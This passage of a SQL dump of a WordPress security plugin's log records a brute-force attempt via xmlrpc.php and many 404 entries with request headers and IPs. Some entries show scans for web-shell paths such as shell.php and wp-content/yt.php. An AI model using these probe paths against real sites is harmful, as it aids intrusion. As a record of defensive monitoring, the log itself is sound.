09:12:33',73379304,74010360,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97267,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-2036819555\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"186\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632129093.0229780673980712890625;s:12:\"REQUEST_TIME\";i:1632129093;}}','notice','2021-09-20 09:11:35','2021-09-20 09:11:33',73379264,74010328,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97265,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:68:\"text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:16:\"en-US, en; q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:9:\"max-age=0\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:20:\"http://zphiblgz.org/\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632119689.9649989604949951171875;s:12:\"REQUEST_TIME\";i:1632119689;}}','notice','2021-09-20 06:34:51','2021-09-20 06:34:50',72631368,72715240,'http://zphiblgz.org/node/add',1,0,'91.90.122.11'),(97266,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:68:\"text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:16:\"en-US, en; q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:9:\"max-age=0\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:20:\"http://zphiblgz.org/\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632119693.0181419849395751953125;s:12:\"REQUEST_TIME\";i:1632119693;}}','notice','2021-09-20 06:34:54','2021-09-20 06:34:53',72668440,72768624,'http://zphiblgz.org/scholarship/node/add',1,0,'91.90.122.11'),(97264,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:68:\"text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:16:\"en-US, en; q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:9:\"max-age=0\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:23:\"https://www.google.com/\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632119678.9930889606475830078125;s:12:\"REQUEST_TIME\";i:1632119678;}}','notice','2021-09-20 06:34:41','2021-09-20 06:34:39',72607112,72690848,'http://zphiblgz.org/scholarship/application/',1,0,'91.90.122.11'),(97263,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632115924.442286014556884765625;s:12:\"REQUEST_TIME\";i:1632115924;}}','notice','2021-09-20 05:32:06','2021-09-20 05:32:04',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'46.148.234.229'),(97261,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:16:\"application/json\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:14:\"ALittle Client\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632113437.147572040557861328125;s:12:\"REQUEST_TIME\";i:1632113437;}}','notice','2021-09-20 04:50:39','2021-09-20 04:50:37',72734264,72818016,'http://zphiblgz.org/language/index.html',1,0,'23.228.109.147'),(97262,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632114486.45477199554443359375;s:12:\"REQUEST_TIME\";i:1632114486;}}','notice','2021-09-20 05:08:08','2021-09-20 05:08:06',72653240,72737864,'https://zphiblgz.org/wp-content/yt.php',1,0,'185.191.34.215'),(97260,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632109103.7470519542694091796875;s:12:\"REQUEST_TIME\";i:1632109103;}}','notice','2021-09-20 03:38:25','2021-09-20 03:38:24',72613192,72696176,'https://zphiblgz.org/scholarship/application/',1,0,'193.169.145.202'),(97259,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632106459.323257923126220703125;s:12:\"REQUEST_TIME\";i:1632106459;}}','notice','2021-09-20 02:54:21','2021-09-20 02:54:19',72168848,72256112,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97319,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632267145.0494821071624755859375;s:12:\"REQUEST_TIME\";i:1632267145;}}','notice','2021-09-21 23:32:26','2021-09-21 23:32:25',72186776,72274040,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97320,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632270747.0918209552764892578125;s:12:\"REQUEST_TIME\";i:1632270747;}}','notice','2021-09-22 00:32:29','2021-09-22 00:32:27',72168320,72251512,'https://zphiblgz.org/event/ladiez-real-talk-empowerment-summit/',1,0,'157.55.39.64'),(97318,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632263210.524980068206787109375;s:12:\"REQUEST_TIME\";i:1632263210;}}','notice','2021-09-21 22:26:52','2021-09-21 22:26:50',72656504,72738872,'https://zphiblgz.org/htaccess.php',1,0,'185.191.34.215'),(97316,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632255577.8100759983062744140625;s:12:\"REQUEST_TIME\";i:1632255577;}}','notice','2021-09-21 20:19:39','2021-09-21 20:19:38',72605616,72689352,'http://zphiblgz.org/scholarship/application/',1,0,'193.160.219.180'),(97317,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632261132.38634395599365234375;s:12:\"REQUEST_TIME\";i:1632261132;}}','notice','2021-09-21 21:52:19','2021-09-21 21:52:14',72630296,72714048,'http://zphiblgz.org/metagameanalysis/',1,0,'52.162.161.148'),(97314,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632255427.5263240337371826171875;s:12:\"REQUEST_TIME\";i:1632255427;}}','notice','2021-09-21 20:17:09','2021-09-21 20:17:07',72613976,72697096,'https://zphiblgz.org/1index.php',1,0,'136.243.171.77'),(97315,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632255429.8674190044403076171875;s:12:\"REQUEST_TIME\";i:1632255429;}}','notice','2021-09-21 20:17:11','2021-09-21 20:17:10',72613976,72697096,'https://zphiblgz.org/3index.php',1,0,'136.243.171.77'),(97312,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632252098.9143168926239013671875;s:12:\"REQUEST_TIME\";i:1632252098;}}','notice','2021-09-21 19:21:41','2021-09-21 19:21:39',72731664,72816304,'https://zphiblgz.org/indes.php',1,0,'185.191.34.215'),(97313,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632255424.5146338939666748046875;s:12:\"REQUEST_TIME\";i:1632255424;}}','notice','2021-09-21 20:17:07','2021-09-21 20:17:04',72741904,72824920,'https://zphiblgz.org/2index.php',1,0,'136.243.171.77'),(97310,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632246614.0874888896942138671875;s:12:\"REQUEST_TIME\";i:1632246614;}}','notice','2021-09-21 17:50:16','2021-09-21 17:50:14',72146248,72229256,'https://zphiblgz.org/application',1,0,'87.250.224.144'),(97311,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632251244.844696044921875;s:12:\"REQUEST_TIME\";i:1632251244;}}','notice','2021-09-21 19:07:26','2021-09-21 19:07:25',72612952,72695888,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.139.3'),(97308,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:1:\"5\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632245182.564941883087158203125;s:12:\"REQUEST_TIME\";i:1632245182;}}','notice','2021-09-21 17:26:24','2021-09-21 17:26:22',72628384,72713024,'https://zphiblgz.org/shell.php',1,0,'185.191.34.215'),(97309,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; 